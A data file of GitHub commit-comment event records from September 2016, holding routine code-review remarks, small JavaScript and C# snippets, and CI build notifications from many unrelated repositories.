{"id":"4555007458","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":18999913,"position":12,"line":37,"path":"SFFBot/Forms/HotkeyFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:30:42Z","updated_at":"2016-09-13T11:30:42Z","body":"SPEAQO :{ why u name it argss that's no cool :-1:"}},"created_at":"2016-09-13T11:30:42Z"}
{"id":"4555010432","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":18999918,"position":5,"line":5,"path":"examples/fastatic/index.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:31:23Z","updated_at":"2016-09-13T11:31:23Z","body":"```javascript\r\nconst path = require('path');\r\nformatter(path.join(__dirname, '/README.md'), __dirname));\r\n```"}},"created_at":"2016-09-13T11:31:23Z"}
{"id":"4555010564","type":"CommitCommentEvent","actor":{"login":"kjgarza"},"repo":{"name":"crosscite/doi-metadata-search"},"payload":{"comment":{"id":18999919,"position":null,"line":null,"path":null,"commit_id":"683ae2fc2fb26abb102c03ed94cd5d7599497e13","created_at":"2016-09-13T11:31:25Z","updated_at":"2016-09-13T11:31:25Z","body":"I actually wanted to ask you about that policy are we adopting here. Most repos I have work with (i.e., citeproc, stats, search) include JS libraries in the repo. So what the principle: including; CDN; or NPM.?"}},"created_at":"2016-09-13T11:31:25Z"}
{"id":"4555011202","type":"CommitCommentEvent","actor":{"login":"coco-napky"},"repo":{"name":"SapienciaBendecidos/fe-bendecidos"},"payload":{"comment":{"id":18999920,"position":59,"line":59,"path":"app/views/cliente.html","commit_id":"b72fada32e80006dc0a7606b89b86df6e01050c3","created_at":"2016-09-13T11:31:34Z","updated_at":"2016-09-13T11:31:34Z","body":"Hay un task aparte para el modal de crear clientes, no te preocupes mucho por eso atm"}},"created_at":"2016-09-13T11:31:34Z"}
{"id":"4555012297","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":18999923,"position":null,"line":null,"path":null,"commit_id":"203b85eb8f1cf2cbb029105ea033959e93259171","created_at":"2016-09-13T11:31:50Z","updated_at":"2016-09-13T11:31:50Z","body":"OK fantastic - i'll look at the new commit when it arrives :)"}},"created_at":"2016-09-13T11:31:50Z"}
{"id":"4555017430","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":18999937,"position":5,"line":5,"path":"examples/fastatic/index.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:33:07Z","updated_at":"2016-09-13T11:33:07Z","body":"```javascript\r\nformatter(path.join(__dirname, '/README.md'))\r\n  .then(html => saveFile(path.join(__dirname. '/index.html'), html));\r\n```"}},"created_at":"2016-09-13T11:33:07Z"}
{"id":"4555017656","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":18999938,"position":38,"line":38,"path":"SFFBot/Forms/SplashFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:33:10Z","updated_at":"2016-09-13T11:33:10Z","body":"use @\"Installed Modules\\Dependencies\\Transitions.dll\"\r\n@ makes it so you don't have to escape \\"}},"created_at":"2016-09-13T11:33:10Z"}
{"id":"4555018159","type":"CommitCommentEvent","actor":{"login":"rmarinho"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":18999940,"position":null,"line":null,"path":null,"commit_id":"368a375f13fc2e4b5ff00dbbdd7a2d6bb53988eb","created_at":"2016-09-13T11:33:16Z","updated_at":"2016-09-13T11:33:16Z","body":"Hey @pauldipietro this broke unittest , need to be revised!"}},"created_at":"2016-09-13T11:33:16Z"}
{"id":"4555020020","type":"CommitCommentEvent","actor":{"login":"sergepyd"},"repo":{"name":"Yonam/SiteInforAfrique"},"payload":{"comment":{"id":18999947,"position":null,"line":null,"path":null,"commit_id":"d9db8a1117f0d731f0a35b01a4022ae6b1649d26","created_at":"2016-09-13T11:33:41Z","updated_at":"2016-09-13T11:33:41Z","body":"yo man! on n'est ensemble jusqu'à la gare.\r\n"}},"created_at":"2016-09-13T11:33:41Z"}
{"id":"4555024719","type":"CommitCommentEvent","actor":{"login":"CybotTM"},"repo":{"name":"mogic-le/timetracker"},"payload":{"comment":{"id":18999957,"position":9,"line":28,"path":"sql/upgrade-1.0.0.sql","commit_id":"5196daac7195543df09a95885875c6f00dfde5bb","created_at":"2016-09-13T11:34:48Z","updated_at":"2016-09-13T11:34:48Z","body":"@nemesis621  is this intentional to delete users when deleting teams, or did i get something wrong here?"}},"created_at":"2016-09-13T11:34:48Z"}
{"id":"4555024811","type":"CommitCommentEvent","actor":{"login":"CybotTM"},"repo":{"name":"mogic-le/timetracker"},"payload":{"comment":{"id":18999958,"position":14,"line":33,"path":"sql/upgrade-1.0.0.sql","commit_id":"5196daac7195543df09a95885875c6f00dfde5bb","created_at":"2016-09-13T11:34:49Z","updated_at":"2016-09-13T11:34:49Z","body":"@nemesis621 same here"}},"created_at":"2016-09-13T11:34:49Z"}
{"id":"4555030676","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":18999973,"position":85,"line":99,"path":"SFFBot/Forms/SplashFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:36:17Z","updated_at":"2016-09-13T11:36:17Z","body":"plz name it like canContinue now it looks Zelkova"}},"created_at":"2016-09-13T11:36:17Z"}
{"id":"4555031257","type":"CommitCommentEvent","actor":{"login":"laruence"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18999975,"position":4,"line":185,"path":"Zend/zend_object_handlers.c","commit_id":"2d8ab51576695630a7471ff829cc5ea10becdc0f","created_at":"2016-09-13T11:36:25Z","updated_at":"2016-09-13T11:36:25Z","body":"I've think both way, I think both of them make senses\r\n\r\nthe reason why I chose this one is because it's more clear.\r\n\r\notherwise, you need add exception checkes after Z_OBJDEBUG_P\r\n\r\nbut if you prefer to do that,  as I said,  I am fine on both way, please to it as you like."}},"created_at":"2016-09-13T11:36:25Z"}
{"id":"4555031792","type":"CommitCommentEvent","actor":{"login":"coco-napky"},"repo":{"name":"SapienciaBendecidos/fe-bendecidos"},"payload":{"comment":{"id":18999977,"position":13,"line":13,"path":"app/styles/_cliente.scss","commit_id":"b72fada32e80006dc0a7606b89b86df6e01050c3","created_at":"2016-09-13T11:36:33Z","updated_at":"2016-09-13T11:36:33Z","body":"`nav { \r\n button-collapse {\r\n    ...  \r\n }\r\n nav-wrapper i{\r\n  ...\r\n }\r\n}`\r\n\r\nPodes hacer nesting asi de reglas para escribir menos en scss >:)"}},"created_at":"2016-09-13T11:36:33Z"}
{"id":"4555033613","type":"CommitCommentEvent","actor":{"login":"b2acon"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":18999986,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-13T11:37:01Z","updated_at":"2016-09-13T11:37:01Z","body":"잘부탁드립니다~"}},"created_at":"2016-09-13T11:37:01Z"}
{"id":"4555034684","type":"CommitCommentEvent","actor":{"login":"wutian2016"},"repo":{"name":"wutian2016/wutian2016.github.io"},"payload":{"comment":{"id":18999988,"position":null,"line":null,"path":null,"commit_id":"567f6ec12ac5651171ae790ba2d1f693ac9f955e","created_at":"2016-09-13T11:37:16Z","updated_at":"2016-09-13T11:37:16Z","body":"www"}},"created_at":"2016-09-13T11:37:16Z"}
{"id":"4555040258","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000000,"position":182,"line":98,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:38:33Z","updated_at":"2016-09-13T11:38:33Z","body":"`Point tile = new Point(e.Packet.ReadInteger(), e.Packet.ReadInteger());`"}},"created_at":"2016-09-13T11:38:33Z"}
{"id":"4555040420","type":"CommitCommentEvent","actor":{"login":"KingHenne"},"repo":{"name":"Jimdo/typings-for-css-modules-plugin"},"payload":{"comment":{"id":19000001,"position":null,"line":null,"path":null,"commit_id":"489be2380f201a71dc0f48b2f5b41b0e8d4a43ed","created_at":"2016-09-13T11:38:36Z","updated_at":"2016-09-13T11:38:36Z","body":"This should be done automatically by npm!?"}},"created_at":"2016-09-13T11:38:36Z"}
{"id":"4555040759","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":19000003,"position":4,"line":14,"path":"application/views/survey/questions/arrays/5point/answer.php","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T11:38:41Z","updated_at":"2016-09-13T11:38:41Z","body":"just make sure it works when you add the class at the template level. "}},"created_at":"2016-09-13T11:38:41Z"}
{"id":"4555041182","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":19000004,"position":null,"line":null,"path":null,"commit_id":"4ff11c4a4cb2d19751cf27275c865ee3a74a5d62","created_at":"2016-09-13T11:38:47Z","updated_at":"2016-09-13T11:38:47Z","body":"👍 "}},"created_at":"2016-09-13T11:38:47Z"}
{"id":"4555045229","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000009,"position":11,"line":11,"path":"index.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:39:44Z","updated_at":"2016-09-13T11:39:44Z","body":"```javascript\r\nfunction formatter(filename, dest) {\r\n  return markdownToHtml(filename)\r\n    .then(html => getPageData(html))\r\n    .then(data => renderHtml(data))\r\n}\r\n```"}},"created_at":"2016-09-13T11:39:44Z"}
{"id":"4555046225","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000012,"position":186,"line":174,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:39:56Z","updated_at":"2016-09-13T11:39:56Z","body":"`_selectedTile = new HPoint(e.Packet.ReadInteger(), e.Packet.ReadInteger());`"}},"created_at":"2016-09-13T11:39:56Z"}
{"id":"4555049134","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000019,"position":5,"line":5,"path":"examples/fastatic/index.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:40:36Z","updated_at":"2016-09-13T11:40:36Z","body":"add error handling:\r\n```javascript\r\nformatter(path.join(__dirname, '/README.md'))\r\n  .then(html => saveFile(path.join(__dirname. '/index.html'), html))\r\n  .catch(err => console.error(err));\r\n```"}},"created_at":"2016-09-13T11:40:36Z"}
{"id":"4555050342","type":"CommitCommentEvent","actor":{"login":"b2acon"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":19000025,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-13T11:40:53Z","updated_at":"2016-09-13T11:40:53Z","body":"안녕하세요 . 조원 박헌진입니다. 잘부탁드립니다~"}},"created_at":"2016-09-13T11:40:53Z"}
{"id":"4555054877","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000035,"position":287,"line":213,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T11:41:53Z","updated_at":"2016-09-13T11:41:53Z","body":"Huh, you have same ID on all hotels or wat?"}},"created_at":"2016-09-13T11:41:53Z"}
{"id":"4555057112","type":"CommitCommentEvent","actor":{"login":"nikitok"},"repo":{"name":"Gdimitron/PiCollectionDeviantArtPlugin"},"payload":{"comment":{"id":19000046,"position":54,"line":213,"path":"src/deviant_html.cpp","commit_id":"f57dd6117c4b3f79f4234ebebcdd3ac585ee1db2","created_at":"2016-09-13T11:42:24Z","updated_at":"2016-09-13T11:42:24Z","body":"@Gdimitron This code is very ugly. You use global variable?! Is it php?\r\nPlease, remove it, and write simple replace function"}},"created_at":"2016-09-13T11:42:24Z"}
{"id":"4555057676","type":"CommitCommentEvent","actor":{"login":"bancer"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19000048,"position":null,"line":null,"path":null,"commit_id":"5253f0b3bd06f3a1e3cc776e6dd90116a5a108e4","created_at":"2016-09-13T11:42:32Z","updated_at":"2016-09-13T11:42:32Z","body":"What are your $url and $formUrl values?"}},"created_at":"2016-09-13T11:42:32Z"}
{"id":"4555058966","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"bioperl/bioperl-live"},"payload":{"comment":{"id":19000053,"position":null,"line":null,"path":null,"commit_id":"e5023eef64adfb4e41598670c14d4e99789ea37c","created_at":"2016-09-13T11:42:50Z","updated_at":"2016-09-13T11:42:50Z","body":"Thank you !"}},"created_at":"2016-09-13T11:42:50Z"}
{"id":"4555059887","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19000057,"position":28,"line":28,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/application/ImageStreamer.java","commit_id":"ef2eb113ffac7135b33bf1e6b661f576498b826a","created_at":"2016-09-13T11:43:04Z","updated_at":"2016-09-13T11:43:04Z","body":"Remove leftover sysout."}},"created_at":"2016-09-13T11:43:04Z"}
{"id":"4555060398","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":19000060,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T11:43:13Z","updated_at":"2016-09-13T11:43:13Z","body":"@sndnvaps i think you should invite me, coz i never used slack before\r\nmy gmail: razor1702@gmail.com"}},"created_at":"2016-09-13T11:43:13Z"}
{"id":"4555061212","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19000063,"position":35,"line":35,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/application/ImageStreamer.java","commit_id":"ef2eb113ffac7135b33bf1e6b661f576498b826a","created_at":"2016-09-13T11:43:25Z","updated_at":"2016-09-13T11:43:25Z","body":"Use propert logging instead of sysouts if you need it."}},"created_at":"2016-09-13T11:43:25Z"}
{"id":"4555064536","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19000073,"position":52,"line":52,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-13T11:44:12Z","updated_at":"2016-09-13T11:44:12Z","body":"在场景和代码量复杂到一定程度的时候，还是推荐用getter和setter的方式进行数据操作，扩展性、可维护性和代码清晰度、代码耦合度都会好很多；当然，具体情况具体分析."}},"created_at":"2016-09-13T11:44:12Z"}
{"id":"4555065342","type":"CommitCommentEvent","actor":{"login":"BISTUwangSZ"},"repo":{"name":"BISTUwangSZ/2014011332Android"},"payload":{"comment":{"id":19000075,"position":30,"line":30,"path":"README.md","commit_id":"f4feb36df3b62b3bbf6c1b4a35cb4cde00b141cd","created_at":"2016-09-13T11:44:22Z","updated_at":"2016-09-13T11:44:22Z","body":"TestGraphics"}},"created_at":"2016-09-13T11:44:22Z"}
{"id":"4555066389","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19000078,"position":null,"line":null,"path":null,"commit_id":"4f980764aa70f05c1e37e80dae8852066c5ab43a","created_at":"2016-09-13T11:44:34Z","updated_at":"2016-09-13T11:44:34Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35247/testReport/) for this commit**"}},"created_at":"2016-09-13T11:44:34Z"}
{"id":"4555066576","type":"CommitCommentEvent","actor":{"login":"k1tt3hk4t"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19000079,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T11:44:37Z","updated_at":"2016-09-13T11:44:37Z","body":"Did we not agree this was a bad idea?\r\n\r\nhttp://teamcofh.com/posts/2014/09/03/so-rf-is-a-thing/"}},"created_at":"2016-09-13T11:44:37Z"}
{"id":"4555068066","type":"CommitCommentEvent","actor":{"login":"xEviL"},"repo":{"name":"bkrrr/Leaflet.D3SvgOverlay"},"payload":{"comment":{"id":19000082,"position":15,"line":56,"path":"L.D3SvgOverlay.js","commit_id":"002178bc23a195ff50df1ebb7bf961ea772c5e59","created_at":"2016-09-13T11:45:00Z","updated_at":"2016-09-13T11:45:00Z","body":"This potentially can break other plugins or Leaflet. The idea was to disable rounding temporarily, only while plugin drawing code is being executed."}},"created_at":"2016-09-13T11:45:00Z"}
{"id":"4555068594","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":19000084,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T11:45:08Z","updated_at":"2016-09-13T11:45:08Z","body":"done, i have invite you @akorshun "}},"created_at":"2016-09-13T11:45:08Z"}
{"id":"4555071294","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19000091,"position":5,"line":29,"path":"band-web/src/main/webapp/publicbandprofile.xhtml","commit_id":"ef2eb113ffac7135b33bf1e6b661f576498b826a","created_at":"2016-09-13T11:45:47Z","updated_at":"2016-09-13T11:45:47Z","body":"Having identical HTML id and class names (\"gallery\" in this case) is generally ill-advised.\r\nChange one of them."}},"created_at":"2016-09-13T11:45:47Z"}
{"id":"4555071481","type":"CommitCommentEvent","actor":{"login":"xEviL"},"repo":{"name":"bkrrr/Leaflet.D3SvgOverlay"},"payload":{"comment":{"id":19000092,"position":24,"line":136,"path":"L.D3SvgOverlay.js","commit_id":"002178bc23a195ff50df1ebb7bf961ea772c5e59","created_at":"2016-09-13T11:45:49Z","updated_at":"2016-09-13T11:45:49Z","body":"I would prefer making this compatible with both D3 `v.3` and `v.4`."}},"created_at":"2016-09-13T11:45:49Z"}
{"id":"4555073356","type":"CommitCommentEvent","actor":{"login":"igitur"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":19000096,"position":null,"line":null,"path":null,"commit_id":"1d3a2818f6ebef17323e0c2caa200028933a4e23","created_at":"2016-09-13T11:46:17Z","updated_at":"2016-09-13T11:46:17Z","body":"Why did you do this? The test now fails on my machine."}},"created_at":"2016-09-13T11:46:17Z"}
{"id":"4555073809","type":"CommitCommentEvent","actor":{"login":"flaviocopes"},"repo":{"name":"getgrav/grav-plugin-admin"},"payload":{"comment":{"id":19000097,"position":null,"line":null,"path":null,"commit_id":"fd8c7889d1c3329fc0363cb87b80b49307eef645","created_at":"2016-09-13T11:46:22Z","updated_at":"2016-09-13T11:46:22Z","body":"https://github.com/getgrav/grav/issues/1034"}},"created_at":"2016-09-13T11:46:22Z"}
{"id":"4555073929","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000098,"position":11,"line":11,"path":"index.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:46:24Z","updated_at":"2016-09-13T11:46:24Z","body":"get headings from page data:\r\n\r\n```javascript\r\nfunction formatter(filename, dest) {\r\n  return markdownToHtml(filename)\r\n    .then(html => getPageData(html))\r\n    .then(data => addHeadings(data))\r\n    .then(data => renderHtml(data))\r\n}\r\n\r\nfunction addHeadings(data) {\r\n  return Object.assign({}, data, { headings: getHeadings(data.body) });\r\n}\r\n```"}},"created_at":"2016-09-13T11:46:24Z"}
{"id":"4555074238","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19000099,"position":90,"line":90,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-13T11:46:29Z","updated_at":"2016-09-13T11:46:29Z","body":"这里和后面很多处都用了map，没必要吧？"}},"created_at":"2016-09-13T11:46:29Z"}
{"id":"4555078210","type":"CommitCommentEvent","actor":{"login":"at-sixes-and-sevens"},"repo":{"name":"at-sixes-and-sevens/helloworld"},"payload":{"comment":{"id":19000107,"position":1,"line":1,"path":"forTest","commit_id":"09e632a91c4cd5eb197130a01f6fc585e3c7c005","created_at":"2016-09-13T11:47:28Z","updated_at":"2016-09-13T11:47:28Z","body":"test?"}},"created_at":"2016-09-13T11:47:28Z"}
{"id":"4555078469","type":"CommitCommentEvent","actor":{"login":"flaviocopes"},"repo":{"name":"getgrav/grav-plugin-admin"},"payload":{"comment":{"id":19000109,"position":15,"line":1997,"path":"classes/controller.php","commit_id":"fd8c7889d1c3329fc0363cb87b80b49307eef645","created_at":"2016-09-13T11:47:32Z","updated_at":"2016-09-13T11:47:32Z","body":"Not related to the fix directly, but noticed a double `/` not needed if multilang was not active"}},"created_at":"2016-09-13T11:47:32Z"}
{"id":"4555080047","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":19000111,"position":42,"line":42,"path":"templates/base_awesome/css/template-core.css","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T11:47:54Z","updated_at":"2016-09-13T11:47:54Z","body":"if what you want is to move the class from the table to it's container, replacing the current _.no-more-tables_ definitions  by _.no-more-tables > table_ should do the trick "}},"created_at":"2016-09-13T11:47:54Z"}
{"id":"4555080679","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19000113,"position":null,"line":null,"path":null,"commit_id":"cec32071034de73cdd2562852f32f6f0ab9bd846","created_at":"2016-09-13T11:48:03Z","updated_at":"2016-09-13T11:48:03Z","body":"@SubJunk I share this point of view ;-)\r\nLet's see if i can handle that hardcoding part for now..."}},"created_at":"2016-09-13T11:48:03Z"}
{"id":"4555081133","type":"CommitCommentEvent","actor":{"login":"agitator"},"repo":{"name":"collective/collective.mediaelementjs"},"payload":{"comment":{"id":19000115,"position":4,"line":12,"path":"collective/mediaelementjs/browser/file.pt","commit_id":"cdcf4f3946ad78db0af0c0e7fc17b746bc9591db","created_at":"2016-09-13T11:48:10Z","updated_at":"2016-09-13T11:48:10Z","body":"seems nobody has used it with ATContentTypes...\r\nThere is also a plone5 branch where ongoing upgrade work happens, focus is on Dexterity and Plone 5"}},"created_at":"2016-09-13T11:48:10Z"}
{"id":"4555082486","type":"CommitCommentEvent","actor":{"login":"madhavaramu"},"repo":{"name":"antsmc2/mics"},"payload":{"comment":{"id":19000126,"position":2,"line":1,"path":"Deployment","commit_id":"48db549113d8f8b28c2bde65476cfff27c5e74dc","created_at":"2016-09-13T11:48:28Z","updated_at":"2016-09-13T11:48:28Z","body":"## Deployment"}},"created_at":"2016-09-13T11:48:28Z"}
{"id":"4555085956","type":"CommitCommentEvent","actor":{"login":"rvicentiu"},"repo":{"name":"rvicentiu/goftp"},"payload":{"comment":{"id":19000135,"position":null,"line":null,"path":null,"commit_id":"dec280eada0141b21132c43fa1f74ceacf98722a","created_at":"2016-09-13T11:49:18Z","updated_at":"2016-09-13T11:49:18Z","body":"Setwd is only safe if using a single connection for now.\r\n\r\nReturning a connection \"handle\" (and marking it so getIdleConn skips it) that could be passed as an argument to other functions may solve the problem"}},"created_at":"2016-09-13T11:49:18Z"}
{"id":"4555088214","type":"CommitCommentEvent","actor":{"login":"kilrah"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19000142,"position":null,"line":null,"path":null,"commit_id":"f1cf84e0a3b3c0fe17f8df790095b446453491d0","created_at":"2016-09-13T11:49:48Z","updated_at":"2016-09-13T11:49:48Z","body":"There is a saveTimers() function that needs to be called as well, ideally this should be put in a similar function and at called at the storage level"}},"created_at":"2016-09-13T11:49:48Z"}
{"id":"4555090182","type":"CommitCommentEvent","actor":{"login":"madhavaramu"},"repo":{"name":"antsmc2/mics"},"payload":{"comment":{"id":19000147,"position":1,"line":1,"path":"Deployment","commit_id":"3f7e97ce5928fb2918b621b7985b5d828bf5b81e","created_at":"2016-09-13T11:50:17Z","updated_at":"2016-09-13T11:50:17Z","body":"## Deployment"}},"created_at":"2016-09-13T11:50:17Z"}
{"id":"4555093084","type":"CommitCommentEvent","actor":{"login":"busyShadow"},"repo":{"name":"busyShadow/myFirst"},"payload":{"comment":{"id":19000156,"position":null,"line":null,"path":null,"commit_id":"434b959644f323c7a93b61ecdf04da075205f51a","created_at":"2016-09-13T11:50:55Z","updated_at":"2016-09-13T11:50:55Z","body":"leave a comment"}},"created_at":"2016-09-13T11:50:55Z"}
{"id":"4555093940","type":"CommitCommentEvent","actor":{"login":"madhavaramu"},"repo":{"name":"antsmc2/mics"},"payload":{"comment":{"id":19000159,"position":17,"line":17,"path":"Deployment","commit_id":"3f7e97ce5928fb2918b621b7985b5d828bf5b81e","created_at":"2016-09-13T11:51:09Z","updated_at":"2016-09-13T11:51:09Z","body":"![usurvey_deployment](https://cloud.githubusercontent.com/assets/22054441/18472673/6ad34cce-79d6-11e6-8ea1-43bc9bbf86bd.png)\r\n"}},"created_at":"2016-09-13T11:51:09Z"}
{"id":"4555094461","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000161,"position":17,"line":17,"path":"lib/markdown-to-html.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:51:16Z","updated_at":"2016-09-13T11:51:16Z","body":"use async versions of imported modules:\r\n\r\n```javascript\r\nfunction markdownToHtml(filename) {\r\n    return new Promise((resolve, reject) => {\r\n        fs.readFile(filename, 'utf8', (err, markdown) => {\r\n          if (err) { reject(err); }\r\n          marked(markdown, (err, html) => {\r\n             err ? reject(err) : resolve(html);\r\n          });\r\n        });\r\n    });\r\n}\r\n```"}},"created_at":"2016-09-13T11:51:16Z"}
{"id":"4555096582","type":"CommitCommentEvent","actor":{"login":"jassmith"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19000170,"position":null,"line":null,"path":null,"commit_id":"f59ee83642ee3ecd306edf7aab0ca0d92a1ed469","created_at":"2016-09-13T11:51:45Z","updated_at":"2016-09-13T11:51:45Z","body":"TeamCity Xamarin.Forms :: Debug :: Cycle7 :: Windows Debug [Build 1351](http://teamcity.xamarin.com/viewLog.html?buildId=130070&buildTypeId=XamarinForms_WindowsDebug) is now running\n"}},"created_at":"2016-09-13T11:51:45Z"}
{"id":"4555100708","type":"CommitCommentEvent","actor":{"login":"jassmith"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19000181,"position":null,"line":null,"path":null,"commit_id":"f59ee83642ee3ecd306edf7aab0ca0d92a1ed469","created_at":"2016-09-13T11:52:42Z","updated_at":"2016-09-13T11:52:42Z","body":"TeamCity Xamarin.Forms :: Debug :: Cycle7 :: Windows Debug [Build 1350](http://teamcity.xamarin.com/viewLog.html?buildId=130069&buildTypeId=XamarinForms_WindowsDebug) outcome was **FAILURE**\nSummary: Tests failed: 3, passed: 3434, ignored: 8 Build time: 00:06:12\n### Failed tests\n```\nXamarin.Forms.Core.UnitTests.dll: Xamarin.Forms.Core.UnitTests.ButtonUnitTest.CommandCanExecuteModifiesEnabled(False): <no details avaliable>\n\nXamarin.Forms.Core.UnitTests.dll: Xamarin.Forms.Core.UnitTests.ButtonUnitTest.CommandCanExecuteUpdatesEnabled: <no details avaliable>\n\nXamarin.Forms.Core.UnitTests.dll: Xamarin.Forms.Core.UnitTests.ButtonUnitTest.CommandSourceTests`1.ReenabledAfterCommandRemoved: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-13T11:52:42Z"}
{"id":"4555102433","type":"CommitCommentEvent","actor":{"login":"jassmith"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19000190,"position":null,"line":null,"path":null,"commit_id":"960f02d0e7549088d15b74bd11628eb987c77a74","created_at":"2016-09-13T11:53:08Z","updated_at":"2016-09-13T11:53:08Z","body":"TeamCity Xamarin.Forms :: Debug :: Cycle7 :: Windows Debug [Build 1352](http://teamcity.xamarin.com/viewLog.html?buildId=130073&buildTypeId=XamarinForms_WindowsDebug) is now running\n"}},"created_at":"2016-09-13T11:53:08Z"}
